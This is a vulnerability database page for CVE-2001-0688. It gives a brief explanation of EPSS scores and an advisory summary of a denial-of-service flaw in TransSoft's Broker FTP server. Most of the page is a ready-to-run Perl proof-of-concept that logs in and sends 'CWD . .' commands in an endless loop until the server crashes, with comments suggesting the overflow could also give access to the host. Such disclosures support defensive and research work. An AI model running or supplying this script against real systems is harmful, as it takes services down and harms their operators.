CVE-2001-0688 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

source: https://www.securityfocus.com/bid/2851/info Broker is a Windows FTP server from TransSoft. Versions of Broker are vulnerable to a denial of service. A CD or CWD command, argumented by an invalid '. .' (dot-space-dot) sequence can, if repeatedly issued, create a buffer overflow causing the server to halt, requiring a restart. The extent of this issue's exploitability is currently unverified. #!/usr/bin/perl # Broker FTP Server 5.9.5.0 DoS proof of concept # # Syntax : perl brokerdos.pl <host> <port> <loginid> <loginpwd> # Impact : eventually causes an access violation in the TSFTPSRV process # the buffer overflow might be exploitable and be used to gain access # to the FTP Server hostcomputer. # # by [ByteRage] <[email protected]> # www.byterage.cjb.net (http://elf.box.sk/byterage/) use IO::Socket; $loginid = "anonymous"; $loginpwd = "anonymous"; if (!($host = $ARGV[0])) { $host = "127.0.0.1"; } print "Logging on @ $host:"; if (!($port = $ARGV[1])) { $port = "21"; } print "$port\n\n"; if (!($loginid = $ARGV[2])) { $loginid = "anonymous"; } if (!($loginpwd = $ARGV[3])) { $loginpwd = "anonymous"; } $SOCK = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "Couldn't create socket !"; $SOCK->autoflush(); # get daemon banner $reply = ""; sysread($SOCK, $reply, 2000); print $reply; # login syswrite $SOCK, "USER $loginid\015\012"; sysread($SOCK, $reply, 2000); print $reply; syswrite $SOCK, "PASS $loginpwd\015\012"; sysread($SOCK, $reply, 2000); print $reply; sysread($SOCK, $reply, 2000); print "$reply\nSending crash ["; if (substr($reply,0,1) == '2') { # Login succesful, send CWD's $i = 1; while ($i) { $i = syswrite $SOCK, "CWD . .\015\012"; print "."; sleep(1); } print "]\nSocket write failed... possible cause : Host down :(\n"; } close($SOCK); exit();